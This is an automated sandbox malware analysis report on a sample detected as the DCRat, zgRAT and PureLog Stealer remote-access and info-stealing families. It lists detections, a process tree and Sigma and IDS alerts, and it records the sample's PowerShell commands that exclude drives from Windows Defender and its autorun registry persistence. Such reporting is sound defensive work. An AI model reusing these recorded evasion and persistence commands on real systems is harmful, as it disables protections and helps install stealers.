Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe

Overview

General Information

Sample name:4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
Analysis ID:1510313
MD5:b8aa70ed9243f5aa9c8dd45e8b6c01e7
SHA1:8d871a1d93cc069413563d42dad3f098f4ac5e5d
SHA256:4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6cae0a25d742b650c62351
Tags:DCRatexe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates autostart registry keys with suspicious names
Creates multiple autostart registry keys
Creates processes via WMI
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe (PID: 6700 cmdline: "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe" MD5: B8AA70ED9243F5AA9C8DD45E8B6C01E7)
    • csc.exe (PID: 6148 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 6880 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6986.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2072A4DD6B9C45BD955850FB555C1F90.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • csc.exe (PID: 7192 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4gjcegjf\4gjcegjf.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 7244 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6B99.tmp" "c:\Windows\System32\CSC5918AA24663347D392372538DC1C654.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 7680 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7712 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7740 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7768 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7808 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7828 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7852 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7876 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7896 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7908 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7944 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7960 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7976 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7992 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8008 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8036 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8080 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8108 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8416 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1ke8OVZbVo.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 9148 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 1888 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • XrtbrRarCSNElLBNKqySVVhxSZIi.exe (PID: 1476 cmdline: "C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe" MD5: B8AA70ED9243F5AA9C8DD45E8B6C01E7)
  • XrtbrRarCSNElLBNKqySVVhxSZIi.exe (PID: 1792 cmdline: "C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe" MD5: B8AA70ED9243F5AA9C8DD45E8B6C01E7)
  • RuntimeBroker.exe (PID: 7548 cmdline: "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe" MD5: B8AA70ED9243F5AA9C8DD45E8B6C01E7)
  • RuntimeBroker.exe (PID: 7612 cmdline: "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe" MD5: B8AA70ED9243F5AA9C8DD45E8B6C01E7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000000.1239399046.0000000000A62000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000002.1566189118.0000000013111000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    Process Memory Space: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe PID: 6700JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      0.0.4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe.a60000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                        0.0.4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe.a60000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Files With System Process Name In Unsuspected Locations
                          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ProcessId: 6700, TargetFilename: C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe
                          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe", ParentImage: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ParentProcessId: 6700, ParentProcessName: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 7680, ProcessName: powershell.exe
                          Sigma detected: System File Execution Location Anomaly
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe", CommandLine: "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, NewProcessName: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, OriginalFileName: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe", ProcessId: 7548, ProcessName: RuntimeBroker.exe
                          Sigma detected: CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ProcessId: 6700, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XrtbrRarCSNElLBNKqySVVhxSZIi
                          Sigma detected: CurrentVersion NT Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ProcessId: 6700, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                          Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe", ParentImage: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ParentProcessId: 6700, ParentProcessName: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline", ProcessId: 6148, ProcessName: csc.exe
                          Sigma detected: Powershell Defender Exclusion
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe", ParentImage: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ParentProcessId: 6700, ParentProcessName: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 7680, ProcessName: powershell.exe
                          Sigma detected: Use Short Name Path in Command Line
                          Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6986.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2072A4DD6B9C45BD955850FB555C1F90.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6986.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2072A4DD6B9C45BD955850FB555C1F90.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 6148, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6986.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2072A4DD6B9C45BD955850FB555C1F90.TMP", ProcessId: 6880, ProcessName: cvtres.exe
                          Sigma detected: Dynamic CSharp Compile Artefact
                          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ProcessId: 6700, TargetFilename: C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline
                          Sigma detected: Non Interactive PowerShell Process Spawned
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe", ParentImage: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ParentProcessId: 6700, ParentProcessName: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 7680, ProcessName: powershell.exe

                          Data Obfuscation

                          barindex
                          Sigma detected: Dot net compiler compiles file from suspicious location
                          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe", ParentImage: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ParentProcessId: 6700, ParentProcessName: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline", ProcessId: 6148, ProcessName: csc.exe

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-09-12T20:17:48.215579+020020480951A Network Trojan was detected192.168.2.74970380.211.144.15680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-09-12T20:18:22.533210+020028033053Unknown Traffic192.168.2.74971034.117.59.81443TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeAvira: detected
                          Antivirus detection for dropped file
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeAvira: detection malicious, Label: TR/Spy.Agent.hwiyw
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeAvira: detection malicious, Label: TR/Spy.Agent.hwiyw
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeAvira: detection malicious, Label: TR/Spy.Agent.hwiyw
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeAvira: detection malicious, Label: TR/Spy.Agent.hwiyw
                          Source: C:\Users\user\AppData\Local\Temp\1ke8OVZbVo.batAvira: detection malicious, Label: BAT/Delbat.C
                          Multi AV Scanner detection for dropped file
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeReversingLabs: Detection: 63%
                          Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exeReversingLabs: Detection: 63%
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeReversingLabs: Detection: 63%
                          Source: C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exeReversingLabs: Detection: 63%
                          Source: C:\Users\user\Desktop\HnmxfGsC.logReversingLabs: Detection: 70%
                          Source: C:\Users\user\Desktop\ynMPgItS.logReversingLabs: Detection: 29%
                          Source: C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exeReversingLabs: Detection: 63%
                          Multi AV Scanner detection for submitted file
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeReversingLabs: Detection: 63%
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Machine Learning detection for dropped file
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeJoe Sandbox ML: detected
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: ;C:\Users\user\AppData\Local\Temp\4gjcegjf\4gjcegjf.pdb source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1443899131.0000000003604000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: ;C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.pdb source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1443899131.0000000003604000.00000004.00000800.00020000.00000000.sdmp

                          Spreading

                          barindex
                          Infects executable files (exe, dll, sys, html)
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
